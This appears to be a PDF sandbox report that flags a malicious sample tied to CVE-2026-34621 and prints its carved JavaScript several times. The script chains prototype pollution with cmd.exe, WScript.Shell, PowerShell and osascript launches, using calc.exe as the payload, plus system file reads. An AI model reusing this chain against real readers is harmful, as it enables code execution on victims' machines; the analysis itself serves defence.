MALICIOUS
354
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 10
-
Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related | critical | CVE likely | CVE_2026_34621_RELATED: PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
-
JavaScript action | low | 4 related findings | PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Prototype-pollution JavaScript pattern | high | PDF_JS_PROTOTYPE_POLLUTION: PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
-
PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script (the character codes passed to String.fromCharCode spell calc.exe, the customary proof-of-concept payload):
app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\(String.fromCharCode\(99,97,108,99,46,101,120,101\)\), true\); -
Embedded JS stream | low | PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript opens or fetches a remote URL/document | low | PDF_JS_REMOTE_DOC_FETCH: Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads. Matched line in script:
app.launchURL('https://www.example.com', true); -
Embedded script payload in PDF stream | high | PDF_EMBEDDED_SCRIPT_PAYLOAD: PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
app.launchURL with file/cmd/UNC target | high | PDF_FOXIT_LAUNCHURL: PDF JavaScript invokes app.launchURL() with a file://, cmd:, or UNC target — Foxit and Adobe handle these schemes inconsistently and they have been used for code execution and NTLM credential theft. (matched in decompressed stream)
-
Suspicious extracted artifact | high | EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: https://www.example.com — referenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x15 | 5443 bytes |
SHA-256: 3bb356747c1f7d54a5c7e2f0edbebe2d8a81716f97d3efa1ae51216e32278feb |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 shell/COM execution token(s). Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
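Preview script — first 1,000 lines of the extracted script. The listing is shown as carved: the stray random tokens and unbalanced /* … */ markers between statements appear to be junk inserted by the sample's generator, so the preview should be read as evidence for the static findings above rather than as runnable code.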
(function _iacowmkctnpd() {
setTimeout(function() {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-27T11:36:08.359596
/* cjG4yzwKGeJWAyl
switch(0) { case 1: break; default: break; }
// === Prototype Pollution (CVE-2026-34621) ===
try {
// 6n1JwlwDkIX1xe1 */
Object.prototype.__defineGetter__('__trusted', function() { return true; });
Object.prototype.constructor.prototype.bypass = true;
WDSlEkVQ6zVnAvy
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
/* mxBSfhkC8ZeRDdu
} catch(e) {}
// === OS Detection ===
2iWR8vihgJEthNg */
var _nilcbvct = 'unknown';
// rGwp4609lgTvdip
try {
if (typeof app !== 'undefined' && app.platform) {
// 2pid5Dfvl6clIso
var _zdnamtmp = app.platform.toLowerCase();
if (_zdnamtmp.indexOf('win') >= 0) _nilcbvct = 'windows';
else if (_zdnamtmp.indexOf('mac') >= 0) _nilcbvct = 'macos';
/* 19ZLwipUA1gkweR
}
KB5GbiwSRnTQY0F
if (_nilcbvct === 'unknown' && typeof navigator !== 'undefined') {
{ let x = 'Q7kA4xvn'; }
var _marfctojtl = navigator.userAgent.toLowerCase();
if (_marfctojtl.indexOf('windows') >= 0) _nilcbvct = 'windows';
try { null.toString(); } catch(e) {}
else if (_marfctojtl.indexOf('mac') >= 0) _nilcbvct = 'macos';
/* MAFxKsEM2Y2MR4a */
else if (_marfctojtl.indexOf('android') >= 0) _nilcbvct = 'android';
/* 37ufbA0G0VZmOk8
else if (_marfctojtl.indexOf('iphone') >= 0 || _marfctojtl.indexOf('ipad') >= 0) _nilcbvct = 'ios';
}
/* c6tGC1GGzonYAOP */
while(false) { break; }
// Adobe-specific mobile detection
if (typeof app !== 'undefined' && app.viewerType) {
if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) _nilcbvct = 'android'; // or ios
}
// Gc27UpIh1Ekpl8d
} catch(e) {}
// === OS-Specific Execution ===
try {
if (_nilcbvct === 'windows') {
// Method 1: app.launchURL with cmd.exe
{ let x = 'Q7kA4xvn'; }
uAJyTHroDGMmxIR
try {
app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent(String.fromCharCode(99,97,108,99,46,101,120,101)), true);
// dNb5lsORSmXCEVD
} catch(e1) {}
// Method 2: ActiveX WScript.Shell
try {
var _unllxuwh = new ActiveXObject('WScript.Shell');
/* dMxVj7WD3o0X0yV */
_unllxuwh.Run(String.fromCharCode(99,97,108,99,46,101,120,101), 0, false);
/* SwTDejkrGVXqIJa
} catch(e2) {}
// Method 3: PowerShell direct
try { null.toString(); } catch(e) {}
rD0uUxiRAdKiubE
try {
if(false) { console.log('s5cV52Wxbb'); }
var _unllxuwh = new ActiveXObject('WScript.Shell');
_unllxuwh.Run(String.fromCharCode(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32)calc.exe"", 0, false);
// pARw6L3Dg88rtpU */
switch(0) { case 1: break; default: break; }
/* TslgKOkTdJHAPEM
} catch(e3) {}
{ let x = 'Q7kA4xvn'; }
} else if (_nilcbvct === 'macos') {
switch(0) { case 1: break; default: break; }
// Method 1: Terminal via file://
/* tfkEArsb3SWIwKr */
try {
{ let x = 'Q7kA4xvn'; }
app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent(String.fromCharCode(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112)), true);
// 3Gu5U9NIyBYZodO */
} catch(e1) {}
// Method 2: osascript
// pSWH7VxKqp0XCIx */
try {
if(false) { console.log('s5cV52Wxbb'); }
var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode(39,32,43,32)open /System/Applications/Calculator.appString.fromCharCode(32,43,32,39)';
try { null.toString(); } catch(e) {}
app.launchURL('osascript://' + encodeURIComponent(_gsgmqwugzic));
} catch(e2) {}
/* QKIfKNL83Ga9vJY
while(false) { break; }
t8ecZjI7C5L4WR0 */
} else {
// Mobile platforms: demo fallback (not vulnerable)
try {
while(false) { break; }
app.launchURL('https://www.example.com', true);
// yIsLHXaXmnG8Ton
app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.');
} catch(e) {}
01ATGV1O6aFAWpw
}
} catch(mainErr) {}
// Additional trigger: attempt privileged file read to escalate context
// tubX4UYuRUH7LMW
try {
if (typeof util !== 'undefined' && util.readFileIntoStream) {
var _vdvdpgtaodbt = (_nilcbvct === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts';
3V4S3KbJ8VWQdI3 */
util.readFileIntoStream({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true});
}
/* DDk3sJEvl9tbjQR */
while(false) { break; }
// cuVdBbhUFigNXfz */
} catch(e) {}
}, 10000);
try { null.toString(); } catch(e) {}
})();
|
|||
javascript_obj0006_001.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x15 | 5638 bytes |
SHA-256: a5585aa266e2b507a7dfd6c948fcc733ed1dd2d91715fee94dde52a7720cf805 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 shell/COM execution token(s). Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script
<< /JS (
\(function _iacowmkctnpd\(\) {
setTimeout\(function\(\) {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-27T11:36:08.359596
/* cjG4yzwKGeJWAyl
switch\(0\) { case 1: break; default: break; }
// === Prototype Pollution \(CVE-2026-34621\) ===
try {
// 6n1JwlwDkIX1xe1 */
Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\);
Object.prototype.constructor.prototype.bypass = true;
WDSlEkVQ6zVnAvy
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
/* mxBSfhkC8ZeRDdu
} catch\(e\) {}
// === OS Detection ===
2iWR8vihgJEthNg */
var _nilcbvct = 'unknown';
// rGwp4609lgTvdip
try {
if \(typeof app !== 'undefined' && app.platform\) {
// 2pid5Dfvl6clIso
var _zdnamtmp = app.platform.toLowerCase\(\);
if \(_zdnamtmp.indexOf\('win'\) >= 0\) _nilcbvct = 'windows';
else if \(_zdnamtmp.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos';
/* 19ZLwipUA1gkweR
}
KB5GbiwSRnTQY0F
if \(_nilcbvct === 'unknown' && typeof navigator !== 'undefined'\) {
{ let x = 'Q7kA4xvn'; }
var _marfctojtl = navigator.userAgent.toLowerCase\(\);
if \(_marfctojtl.indexOf\('windows'\) >= 0\) _nilcbvct = 'windows';
try { null.toString\(\); } catch\(e\) {}
else if \(_marfctojtl.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos';
/* MAFxKsEM2Y2MR4a */
else if \(_marfctojtl.indexOf\('android'\) >= 0\) _nilcbvct = 'android';
/* 37ufbA0G0VZmOk8
else if \(_marfctojtl.indexOf\('iphone'\) >= 0 || _marfctojtl.indexOf\('ipad'\) >= 0\) _nilcbvct = 'ios';
}
/* c6tGC1GGzonYAOP */
while\(false\) { break; }
// Adobe-specific mobile detection
if \(typeof app !== 'undefined' && app.viewerType\) {
if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) _nilcbvct = 'android'; // or ios
}
// Gc27UpIh1Ekpl8d
} catch\(e\) {}
// === OS-Specific Execution ===
try {
if \(_nilcbvct === 'windows'\) {
// Method 1: app.launchURL with cmd.exe
{ let x = 'Q7kA4xvn'; }
uAJyTHroDGMmxIR
try {
app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\(String.fromCharCode\(99,97,108,99,46,101,120,101\)\), true\);
// dNb5lsORSmXCEVD
} catch\(e1\) {}
// Method 2: ActiveX WScript.Shell
try {
var _unllxuwh = new ActiveXObject\('WScript.Shell'\);
/* dMxVj7WD3o0X0yV */
_unllxuwh.Run\(String.fromCharCode\(99,97,108,99,46,101,120,101\), 0, false\);
/* SwTDejkrGVXqIJa
} catch\(e2\) {}
// Method 3: PowerShell direct
try { null.toString\(\); } catch\(e\) {}
rD0uUxiRAdKiubE
try {
if\(false\) { console.log\('s5cV52Wxbb'\); }
var _unllxuwh = new ActiveXObject\('WScript.Shell'\);
_unllxuwh.Run\(String.fromCharCode\(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32\)calc.exe"", 0, false\);
// pARw6L3Dg88rtpU */
switch\(0\) { case 1: break; default: break; }
/* TslgKOkTdJHAPEM
} catch\(e3\) {}
{ let x = 'Q7kA4xvn'; }
} else if \(_nilcbvct === 'macos'\) {
switch\(0\) { case 1: break; default: break; }
// Method 1: Terminal via file://
/* tfkEArsb3SWIwKr */
try {
{ let x = 'Q7kA4xvn'; }
app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\(String.fromCharCode\(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112\)\), true\);
// 3Gu5U9NIyBYZodO */
} catch\(e1\) {}
// Method 2: osascript
// pSWH7VxKqp0XCIx */
try {
if\(false\) { console.log\('s5cV52Wxbb'\); }
var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode\(39,32,43,32\)open /System/Applications/Calculator.appString.fromCharCode\(32,43,32,39\)';
try { null.toString\(\); } catch\(e\) {}
app.launchURL\('osascript://' + encodeURIComponent\(_gsgmqwugzic\)\);
} catch\(e2\) {}
/* QKIfKNL83Ga9vJY
while\(false\) { break; }
t8ecZjI7C5L4WR0 */
} else {
// Mobile platforms: demo fallback \(not vulnerable\)
try {
while\(false\) { break; }
app.launchURL\('https://www.example.com', true\);
// yIsLHXaXmnG8Ton
app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\);
} catch\(e\) {}
01ATGV1O6aFAWpw
}
} catch\(mainErr\) {}
// Additional trigger: attempt privileged file read to escalate context
// tubX4UYuRUH7LMW
try {
if \(typeof util !== 'undefined' && util.readFileIntoStream\) {
var _vdvdpgtaodbt = \(_nilcbvct === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts';
3V4S3KbJ8VWQdI3 */
util.readFileIntoStream\({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}\);
}
/* DDk3sJEvl9tbjQR */
while\(false\) { break; }
// cuVdBbhUFigNXfz */
} catch\(e\) {}
}, 10000\);
try { null.toString\(\); } catch\(e\) {}
}\)\(\);
) /S /JavaScript >>
|
|||
embedded_pdf_script_00000a66.bin |
pdf-embedded-script | PDF decompressed stream script payload at offset 0xA66 | 4085 bytes |
SHA-256: b0caeea48abd6e2ce137eacd9286ab117c90ca728318b6f8bcf23ca33e43a079 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 shell/COM execution token(s). Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script
_marfctojtl.indexOf('windows') >= 0) _nilcbvct = 'windows';
try { null.toString(); } catch(e) {}
else if (_marfctojtl.indexOf('mac') >= 0) _nilcbvct = 'macos';
/* MAFxKsEM2Y2MR4a */
else if (_marfctojtl.indexOf('android') >= 0) _nilcbvct = 'android';
/* 37ufbA0G0VZmOk8
else if (_marfctojtl.indexOf('iphone') >= 0 || _marfctojtl.indexOf('ipad') >= 0) _nilcbvct = 'ios';
}
/* c6tGC1GGzonYAOP */
while(false) { break; }
// Adobe-specific mobile detection
if (typeof app !== 'undefined' && app.viewerType) {
if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) _nilcbvct = 'android'; // or ios
}
// Gc27UpIh1Ekpl8d
} catch(e) {}
// === OS-Specific Execution ===
try {
if (_nilcbvct === 'windows') {
// Method 1: app.launchURL with cmd.exe
{ let x = 'Q7kA4xvn'; }
uAJyTHroDGMmxIR
try {
app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent(String.fromCharCode(99,97,108,99,46,101,120,101)), true);
// dNb5lsORSmXCEVD
} catch(e1) {}
// Method 2: ActiveX WScript.Shell
try {
var _unllxuwh = new ActiveXObject('WScript.Shell');
/* dMxVj7WD3o0X0yV */
_unllxuwh.Run(String.fromCharCode(99,97,108,99,46,101,120,101), 0, false);
/* SwTDejkrGVXqIJa
} catch(e2) {}
// Method 3: PowerShell direct
try { null.toString(); } catch(e) {}
rD0uUxiRAdKiubE
try {
if(false) { console.log('s5cV52Wxbb'); }
var _unllxuwh = new ActiveXObject('WScript.Shell');
_unllxuwh.Run(String.fromCharCode(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32)calc.exe"", 0, false);
// pARw6L3Dg88rtpU */
switch(0) { case 1: break; default: break; }
/* TslgKOkTdJHAPEM
} catch(e3) {}
{ let x = 'Q7kA4xvn'; }
} else if (_nilcbvct === 'macos') {
switch(0) { case 1: break; default: break; }
// Method 1: Terminal via file://
/* tfkEArsb3SWIwKr */
try {
{ let x = 'Q7kA4xvn'; }
app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent(String.fromCharCode(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112)), true);
// 3Gu5U9NIyBYZodO */
} catch(e1) {}
// Method 2: osascript
// pSWH7VxKqp0XCIx */
try {
if(false) { console.log('s5cV52Wxbb'); }
var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode(39,32,43,32)open /System/Applications/Calculator.appString.fromCharCode(32,43,32,39)';
try { null.toString(); } catch(e) {}
app.launchURL('osascript://' + encodeURIComponent(_gsgmqwugzic));
} catch(e2) {}
/* QKIfKNL83Ga9vJY
while(false) { break; }
t8ecZjI7C5L4WR0 */
} else {
// Mobile platforms: demo fallback (not vulnerable)
try {
while(false) { break; }
app.launchURL('https://www.example.com', true);
// yIsLHXaXmnG8Ton
app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.');
} catch(e) {}
01ATGV1O6aFAWpw
}
} catch(mainErr) {}
// Additional trigger: attempt privileged file read to escalate context
// tubX4UYuRUH7LMW
try {
if (typeof util !== 'undefined' && util.readFileIntoStream) {
var _vdvdpgtaodbt = (_nilcbvct === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts';
3V4S3KbJ8VWQdI3 */
util.readFileIntoStream({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true});
}
/* DDk3sJEvl9tbjQR */
while(false) { break; }
// cuVdBbhUFigNXfz */
} catch(e) {}
}, 10000);
try { null.toString(); } catch(e) {}
})();
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x15 | 11082 bytes |
SHA-256: 4fc2a10c5c5dc0fea4ca1de99ef0e6f1f4416e417093b51f6aa643b567a5f14d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 16 shell/COM execution token(s). Carved artifact contains 12 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script
(function _iacowmkctnpd() {
setTimeout(function() {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-27T11:36:08.359596
/* cjG4yzwKGeJWAyl
switch(0) { case 1: break; default: break; }
// === Prototype Pollution (CVE-2026-34621) ===
try {
// 6n1JwlwDkIX1xe1 */
Object.prototype.__defineGetter__('__trusted', function() { return true; });
Object.prototype.constructor.prototype.bypass = true;
WDSlEkVQ6zVnAvy
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
/* mxBSfhkC8ZeRDdu
} catch(e) {}
// === OS Detection ===
2iWR8vihgJEthNg */
var _nilcbvct = 'unknown';
// rGwp4609lgTvdip
try {
if (typeof app !== 'undefined' && app.platform) {
// 2pid5Dfvl6clIso
var _zdnamtmp = app.platform.toLowerCase();
if (_zdnamtmp.indexOf('win') >= 0) _nilcbvct = 'windows';
else if (_zdnamtmp.indexOf('mac') >= 0) _nilcbvct = 'macos';
/* 19ZLwipUA1gkweR
}
KB5GbiwSRnTQY0F
if (_nilcbvct === 'unknown' && typeof navigator !== 'undefined') {
{ let x = 'Q7kA4xvn'; }
var _marfctojtl = navigator.userAgent.toLowerCase();
if (_marfctojtl.indexOf('windows') >= 0) _nilcbvct = 'windows';
try { null.toString(); } catch(e) {}
else if (_marfctojtl.indexOf('mac') >= 0) _nilcbvct = 'macos';
/* MAFxKsEM2Y2MR4a */
else if (_marfctojtl.indexOf('android') >= 0) _nilcbvct = 'android';
/* 37ufbA0G0VZmOk8
else if (_marfctojtl.indexOf('iphone') >= 0 || _marfctojtl.indexOf('ipad') >= 0) _nilcbvct = 'ios';
}
/* c6tGC1GGzonYAOP */
while(false) { break; }
// Adobe-specific mobile detection
if (typeof app !== 'undefined' && app.viewerType) {
if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) _nilcbvct = 'android'; // or ios
}
// Gc27UpIh1Ekpl8d
} catch(e) {}
// === OS-Specific Execution ===
try {
if (_nilcbvct === 'windows') {
// Method 1: app.launchURL with cmd.exe
{ let x = 'Q7kA4xvn'; }
uAJyTHroDGMmxIR
try {
app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent(String.fromCharCode(99,97,108,99,46,101,120,101)), true);
// dNb5lsORSmXCEVD
} catch(e1) {}
// Method 2: ActiveX WScript.Shell
try {
var _unllxuwh = new ActiveXObject('WScript.Shell');
/* dMxVj7WD3o0X0yV */
_unllxuwh.Run(String.fromCharCode(99,97,108,99,46,101,120,101), 0, false);
/* SwTDejkrGVXqIJa
} catch(e2) {}
// Method 3: PowerShell direct
try { null.toString(); } catch(e) {}
rD0uUxiRAdKiubE
try {
if(false) { console.log('s5cV52Wxbb'); }
var _unllxuwh = new ActiveXObject('WScript.Shell');
_unllxuwh.Run(String.fromCharCode(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32)calc.exe"", 0, false);
// pARw6L3Dg88rtpU */
switch(0) { case 1: break; default: break; }
/* TslgKOkTdJHAPEM
} catch(e3) {}
{ let x = 'Q7kA4xvn'; }
} else if (_nilcbvct === 'macos') {
switch(0) { case 1: break; default: break; }
// Method 1: Terminal via file://
/* tfkEArsb3SWIwKr */
try {
{ let x = 'Q7kA4xvn'; }
app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent(String.fromCharCode(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112)), true);
// 3Gu5U9NIyBYZodO */
} catch(e1) {}
// Method 2: osascript
// pSWH7VxKqp0XCIx */
try {
if(false) { console.log('s5cV52Wxbb'); }
var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode(39,32,43,32)open /System/Applications/Calculator.appString.fromCharCode(32,43,32,39)';
try { null.toString(); } catch(e) {}
app.launchURL('osascript://' + encodeURIComponent(_gsgmqwugzic));
} catch(e2) {}
/* QKIfKNL83Ga9vJY
while(false) { break; }
t8ecZjI7C5L4WR0 */
} else {
// Mobile platforms: demo fallback (not vulnerable)
try {
while(false) { break; }
app.launchURL('https://www.example.com', true);
// yIsLHXaXmnG8Ton
app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.');
} catch(e) {}
01ATGV1O6aFAWpw
}
} catch(mainErr) {}
// Additional trigger: attempt privileged file read to escalate context
// tubX4UYuRUH7LMW
try {
if (typeof util !== 'undefined' && util.readFileIntoStream) {
var _vdvdpgtaodbt = (_nilcbvct === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts';
3V4S3KbJ8VWQdI3 */
util.readFileIntoStream({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true});
}
/* DDk3sJEvl9tbjQR */
while(false) { break; }
// cuVdBbhUFigNXfz */
} catch(e) {}
}, 10000);
try { null.toString(); } catch(e) {}
})();
<< /JS (
\(function _iacowmkctnpd\(\) {
setTimeout\(function\(\) {
// CVE-2026-34621 Cross-Platform Exploit
// Generated: 2026-04-27T11:36:08.359596
/* cjG4yzwKGeJWAyl
switch\(0\) { case 1: break; default: break; }
// === Prototype Pollution \(CVE-2026-34621\) ===
try {
// 6n1JwlwDkIX1xe1 */
Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\);
Object.prototype.constructor.prototype.bypass = true;
WDSlEkVQ6zVnAvy
Object.prototype.__proto__.privileged = true;
Array.prototype.__proto__.polluted = true;
/* mxBSfhkC8ZeRDdu
} catch\(e\) {}
// === OS Detection ===
2iWR8vihgJEthNg */
var _nilcbvct = 'unknown';
// rGwp4609lgTvdip
try {
if \(typeof app !== 'undefined' && app.platform\) {
// 2pid5Dfvl6clIso
var _zdnamtmp = app.platform.toLowerCase\(\);
if \(_zdnamtmp.indexOf\('win'\) >= 0\) _nilcbvct = 'windows';
else if \(_zdnamtmp.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos';
/* 19ZLwipUA1gkweR
}
KB5GbiwSRnTQY0F
if \(_nilcbvct === 'unknown' && typeof navigator !== 'undefined'\) {
{ let x = 'Q7kA4xvn'; }
var _marfctojtl = navigator.userAgent.toLowerCase\(\);
if \(_marfctojtl.indexOf\('windows'\) >= 0\) _nilcbvct = 'windows';
try { null.toString\(\); } catch\(e\) {}
else if \(_marfctojtl.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos';
/* MAFxKsEM2Y2MR4a */
else if \(_marfctojtl.indexOf\('android'\) >= 0\) _nilcbvct = 'android';
/* 37ufbA0G0VZmOk8
else if \(_marfctojtl.indexOf\('iphone'\) >= 0 || _marfctojtl.indexOf\('ipad'\) >= 0\) _nilcbvct = 'ios';
}
/* c6tGC1GGzonYAOP */
while\(false\) { break; }
// Adobe-specific mobile detection
if \(typeof app !== 'undefined' && app.viewerType\) {
if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) _nilcbvct = 'android'; // or ios
}
// Gc27UpIh1Ekpl8d
} catch\(e\) {}
// === OS-Specific Execution ===
try {
if \(_nilcbvct === 'windows'\) {
// Method 1: app.launchURL with cmd.exe
{ let x = 'Q7kA4xvn'; }
uAJyTHroDGMmxIR
try {
app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\(String.fromCharCode\(99,97,108,99,46,101,120,101\)\), true\);
// dNb5lsORSmXCEVD
} catch\(e1\) {}
// Method 2: ActiveX WScript.Shell
try {
var _unllxuwh = new ActiveXObject\('WScript.Shell'\);
/* dMxVj7WD3o0X0yV */
_unllxuwh.Run\(String.fromCharCode\(99,97,108,99,46,101,120,101\), 0, false\);
/* SwTDejkrGVXqIJa
} catch\(e2\) {}
// Method 3: PowerShell direct
try { null.toString\(\); } catch\(e\) {}
rD0uUxiRAdKiubE
try {
if\(false\) { console.log\('s5cV52Wxbb'\); }
var _unllxuwh = new ActiveXObject\('WScript.Shell'\);
_unllxuwh.Run\(String.fromCharCode\(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32\)calc.exe"", 0, false\);
// pARw6L3Dg88rtpU */
switch\(0\) { case 1: break; default: break; }
/* TslgKOkTdJHAPEM
} catch\(e3\) {}
{ let x = 'Q7kA4xvn'; }
} else if \(_nilcbvct === 'macos'\) {
switch\(0\) { case 1: break; default: break; }
// Method 1: Terminal via file://
/* tfkEArsb3SWIwKr */
try {
{ let x = 'Q7kA4xvn'; }
app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\(String.fromCharCode\(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112\)\), true\);
// 3Gu5U9NIyBYZodO */
} catch\(e1\) {}
// Method 2: osascript
// pSWH7VxKqp0XCIx */
try {
if\(false\) { console.log\('s5cV52Wxbb'\); }
var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode\(39,32,43,32\)open /System/Applications/Calculator.appString.fromCharCode\(32,43,32,39\)';
try { null.toString\(\); } catch\(e\) {}
app.launchURL\('osascript://' + encodeURIComponent\(_gsgmqwugzic\)\);
} catch\(e2\) {}
/* QKIfKNL83Ga9vJY
while\(false\) { break; }
t8ecZjI7C5L4WR0 */
} else {
// Mobile platforms: demo fallback \(not vulnerable\)
try {
while\(false\) { break; }
app.launchURL\('https://www.example.com', true\);
// yIsLHXaXmnG8Ton
app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\);
} catch\(e\) {}
01ATGV1O6aFAWpw
}
} catch\(mainErr\) {}
// Additional trigger: attempt privileged file read to escalate context
// tubX4UYuRUH7LMW
try {
if \(typeof util !== 'undefined' && util.readFileIntoStream\) {
var _vdvdpgtaodbt = \(_nilcbvct === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts';
3V4S3KbJ8VWQdI3 */
util.readFileIntoStream\({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}\);
}
/* DDk3sJEvl9tbjQR */
while\(false\) { break; }
// cuVdBbhUFigNXfz */
} catch\(e\) {}
}, 10000\);
try { null.toString\(\); } catch\(e\) {}
}\)\(\);
) /S /JavaScript >>
|
|||